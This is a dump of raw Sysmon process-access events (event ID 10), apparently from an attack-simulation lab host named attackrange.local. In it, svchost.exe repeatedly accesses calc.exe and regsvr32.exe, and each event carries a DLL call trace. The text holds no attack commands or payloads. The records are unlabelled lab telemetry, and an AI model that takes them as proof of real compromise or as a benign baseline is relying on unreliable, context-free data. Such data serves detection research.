22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360181Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360180Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360179Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360178Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360177Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360176Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a45-6013-2700-000000001100}162411036C:\Windows\System32\svchost.exe{8e433fbf-36df-6013-9f03-000000001100}10200C:\Windows\system32\regsvr32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|c:\windows\system32\themeservice.dll+1d60|c:\windows\system32\themeservice.dll+1595|c:\windows\system32\themeservice.dll+1461|c:\windows\system32\themeservice.dll+1886|C:\Windows\SYSTEM32\ntdll.dll+2f6d5|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360175Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360174Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a45-6013-2700-000000001100}16242136C:\Windows\System32\svchost.exe{8e433fbf-36df-6013-9f03-000000001100}10200C:\Windows\system32\regsvr32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+9c584|c:\windows\system32\themeservice.dll+1a9a|c:\windows\system32\themeservice.dll+1736|c:\windows\system32\themeservice.dll+6026|c:\windows\system32\themeservice.dll+ad9a|c:\windows\system32\themeservice.dll+9dcf|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360173Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360172Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360171Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360170Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360169Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360168Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360167Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360166Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360165Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360164Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360163Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360162Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360161Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360160Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360159Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 